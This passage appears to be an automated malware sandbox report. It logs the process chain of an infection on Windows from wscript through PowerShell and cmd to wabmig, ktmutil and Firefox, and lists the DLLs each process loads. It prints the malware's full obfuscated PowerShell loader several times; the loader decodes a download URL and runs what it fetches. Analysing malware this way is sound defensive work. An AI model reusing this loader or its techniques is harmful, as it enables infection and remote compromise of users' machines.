in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMCla
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaMod
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
